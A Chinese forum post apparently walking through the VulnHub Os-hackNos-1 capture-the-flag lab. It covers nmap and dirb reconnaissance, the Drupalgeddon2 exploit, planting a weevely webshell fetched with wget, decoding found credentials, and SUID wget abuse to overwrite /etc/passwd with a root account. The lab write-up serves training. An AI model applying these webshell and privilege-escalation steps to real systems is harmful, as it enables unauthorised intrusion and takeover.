ToB企服应用市场:ToB评测及商务社交产业平台

标题: Os-hackNos-1 [打印本页]

---

作者: 羊蹓狼    时间: 2024-5-15 18:26
标题: Os-hackNos-1
一、环境搭建

实验主机：kali-linux 2023 虚拟机（VM）
实验靶机：Os-hackNos-1 靶机（VM）
实验网络：桥接模式
flag：1.平凡用户的user.txt；2.root用户的user.txt
技能：漏洞利用 | web应用 | 暴力破解 | 权限提升
靶机下载：https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
二、信息收集

主机发现：

• 确认自己的信息
  

1. 1 ifconfig

复制代码

• 探测网段存活主机
  

1. 1 nmap -sP 192.168.133.0/24

复制代码

• 也可以利用如下命令
  

1. 1 netdiscover -i eth0 -r 192.168.133.0/24

复制代码

端口扫描：

• 探测操作体系及软件版本信息
  

1. 1 nmap -sTV -p- -Pn 192.168.133.97

复制代码

• 经过探测发现开放22端口和80端口
  

1. 1 22 端口 ：SSH 服务端口，可能存在弱口令和暴力破解
2. 2 80 端口 ：HTTP 端口，可以通过目录扫描，去发现网站目录或者网站源码泄露或者备份文件泄露

复制代码

• 访问一下80端口
  

目录探测：

• 探测一下网站目录信息
  

1. 1 dirb http://192.168.133.97

复制代码

• 可以看到网站CMS为drupal7，存在远程代码实行的漏洞，利用kali的msf模块，搜刮drupal对应的exp
  

三、漏洞发现

• CMS版本为drupal7，搜刮一下关于该版本的CMS漏洞
  

四、漏洞利用

1. 1 将脚本拷贝下来
2. 2 git clone https://github.com/dreadlocked/Drupalgeddon2.git
3. 3
4. 4 在运行脚本前，需要预装依赖包 highline
5. 5 gem install highline
6. 6
7. 7 执行脚本
8. 8 ruby drupalgeddon2.rb http://192.168.133.97/drupal/

复制代码

• 查看权限
  

• 查看目录文件
  

五、权限提升

利用weevely（kali 菜刀）

• 利用weevely 天生木马，再将木马上传到靶机上
  

1. 1 生成木马：
2. 2 weevely generate hello ./door.php
3. 3
4. 4 打开kali web服务器：
5. 5 python -m http.server 80
6. 6
7. 7 在靶机上使用wget工具下载 kali 上生成的木马文件：
8. 8 wget http://192.168.133.125:80/door.php

复制代码

• 利用weevely天生的木马内容
  

• 连接靶机，留意此处权限和路径问题会导致连接失败
  

1. 1 weevely http://192.168.133.97/drupal/door.php hello

复制代码

浏览用户目录

• 查看是否存在有用的信息
  

1. 1 cd /home
2. 2 ls -lh
3. 3 cd james/
4. 4 ls -lh
5. 5 cat user.txt

复制代码

• 在 james 用户目录下发现一串MD5哈希值，解码失败
  

1. 1 bae11ce4f67af91fa58576c1da2aad4b

复制代码

• 浏览一下网站根目录，发现其他文件
  

• 解码之后再次利用Brainfuck解码
  

• 得到：james:Hacker@4514
  

切换用户

• 尝试切换用户，发现不能切换用户
  

suid 提权

• 检查哪些命令具有suid权限（具有suid权限的命令可以以文件拥有者的权限实行）
  

1. 1  audit_suidsgid -only-suid /

复制代码

• 看到拥有wget的权限，这里的思路是把/etc/passwd的文件下载下来，然后添加一个具有root权限的用户，再传回去覆盖它。首先进行创建一个用户
  

1. 1 openssl passwd -1 -salt 账号 密码

复制代码

• 搭建web服务器，把靶机上的/etc/passwd下载下来
  

• 然后将刚才创建的用户加入进去，并在kali上开一个web服务器，用靶机连接下载已经更改的/ect/passwd去覆盖掉原来的文件即可
  

• 然后查看靶机上是否有新增账户，发现lxx账号信息即创建乐成
  

• 切换失败，此方法行不通
  

利用metasploit

• 搜刮漏洞组件
  

• 选择利用的工具模块，并设置相关参数
  

• 查看设置参数
  

• 攻击乐成后，表现没有交互式shell，需要提升为交互式shell
  

1. 1 python3 -c "import pty;pty.spawn('/bin/bash')"

复制代码

•  得到权限后切换用户，再次失败
  

错误总结

• 最终结合经验发现，写入新建的账户有问题，即覆盖的root权限的用户创建失败
  

• 更改为admin账户后，在metasploit得到权限后即可切换用户
  

• 末了进入/root 目录下查看root.txt 完成测试
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4